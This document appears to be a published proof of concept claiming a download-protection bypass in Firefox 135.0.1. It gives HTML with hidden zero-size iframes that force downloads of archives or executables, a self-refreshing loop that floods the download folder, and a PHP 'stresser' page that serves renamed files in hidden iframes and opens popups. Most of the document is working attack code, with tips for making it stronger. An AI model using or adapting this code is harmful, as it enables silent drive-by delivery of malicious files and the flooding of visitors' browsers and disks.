# Exploit Title: Firefox 135.0.1 bypass Download protections (PoC)
# Date: 2025-02-28
# Exploit Author: Emiliano Febbi
# Vendor Homepage: https://www.mozilla.org/it/firefox/new/
# Software Link: https://www.mozilla.org/it/firefox/download/thanks/
# Version: 135.0.1
# Tested on: Windows 10
 __________________________________________________________________________________________________________________________________________________
| ************************************************************************************************************************************************ |
|  How can we start a download without requesting it, how can this bug be used to clog up our default download folder, how to do it with PHP too.  |
 **************************************************************************************************************************************************


                               Forced and stealthy browser download: (#All Tested on Firefox 135.0.1)
                                                            #############
                                                            # HTML-Code # 
                                                            #############
                                                              example: @1

                                    <iframe id="brw" title="single_download" width="0" height="0" src="file.zip">
                                    </iframe>

The formats tested are .rar, .zip, .exe etc.
The path of URL in IFRAME file can be modify with the full path (http://www.badsite.com/file.zip) it's optional.
Just include these few lines of code in an html or php page to allow the file to be downloaded automatically.

                                                            #############
                                                            # HTML-Code # 
                                                            #############
                                                              example: @2  
 
                                                          Filename = loop.html

                                  <meta http-equiv="refresh" content="0; URL='loop.html'" />
                                  <iframe id="brw" title="loop" width="0" height="0" src="file.zip">
                                  </iframe>

In this case, unlike the first one, the downloads will go in a loop, if the tab is not closed
they will clog up your download folder in a very short time.
No protection will prevent mass downloads, being html code.

                     <!--For these few lines of code, downloads will always appear safe in front of the browser.-->

                                                            #############
                                                            # PHP-Code  # 
                                                            #############
                                       This is a Stresser for browsers, but tested on Firefox
______________________________________________________________________________________________________________________________________________________________
..............................................................................................................................................................



<html>
<head><title>Browser Stresser</title></head>
<body>
<?php
/*                  launch me                              */
/* ------------------------------------------------------- */
/*| File zip need in name exploit_ (ex. exploit_brw.zip)  |*/
/* ------------------------------------------------------- */
/*              nullsite.altervista.org                    */
$three = array(
"zip",
"null",
"fake",  //can modify this array to try Load an Firefox addon (extension: .xpi)
      );
 foreach ($three as  $threez)               {
 foreach (glob("./*.$threez") as $file_ext) {
$exploit = 'exploit_';
if (strpos($file_ext, $exploit) != false)   {
$file_ext2 = str_replace("./", "", "$file_ext");
                     echo "Zip File Loaded<br>";
};
    };;
         };;;
$exploit_Fldf = array("exploit_a293.zip", "exploit_2223.zip", "exploit_349i.zip", "exploit_32j3.zip", "exploit_9349.zip", "exploit_93uk.zip",
                      "exploit_3483.zip", "exploit_93u3.zip", "exploit_934i.zip", "exploit_232c.zip", "exploit_233c.zip", "exploit_cjn3.zip");
$exploit_Fld = array_rand($exploit_Fldf, 2);
foreach($exploit_Fld as $exploit_Fldr)      {

rename("$file_ext2", "$exploit_Fldf[$exploit_Fldr]");           
               };;;;
            echo "$exploit_Fldf[$exploit_Fldr] <br>";
            echo '<iframe id="brw" title="exploit_download" width="0" height="0" src="'.$exploit_Fldf[$exploit_Fldr].'"> //can duplicate this line
                                          </iframe>';
?>
<meta http-equiv="refresh" content="0;url=<?php echo $_SERVER['PHP_SELF']; ?>">
               <body onload="window.open('<?php echo $_SERVER['PHP_SELF']; ?>','Stresser','width=30 0,height=100,top=100,left=100')">
</body>
</html>

______________________________________________________________________________________________________________________________________________________________
..............................................................................................................................................................

                                                     EXPLICATION:

ok! this simple PHP code is not very effective for a stress test of the browser software probably there are checks on the page code by Firefox 
against some lines of HTML that go unnoticed.
                                                    #IMPORTANT:
So it is possible to enhance it simply by modifying a few lines of code, or simply by using more archives together, the more files to download the greater 
the mass of downloaded files, which however will be consumed during the procedure by the script.
It will have the same effect as the lines of html code.


    <!--all this to bypass firefox protections on the origin of the downloaded material and on the verification of the quantity.-->